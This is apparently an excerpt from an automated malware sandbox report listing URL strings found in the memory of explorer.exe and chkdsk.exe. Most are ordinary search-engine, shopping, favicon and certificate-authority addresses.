Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000006.00000000.2205008469.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.2205008469.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.thawte.com0
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000006.00000002.2382532795.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000006.00000000.2207019082.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000006.00000000.2205008469.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2226075654.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000006.00000000.2206551971.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.2205008469.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.2226075654.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000006.00000002.2382532795.0000000001C70000.00000002.00000001.sdmp, chkdsk.exe, 00000009.00000002.2382312066.00000000009D0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2206551971.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2205008469.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.2206551971.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://www.mozilla.com0
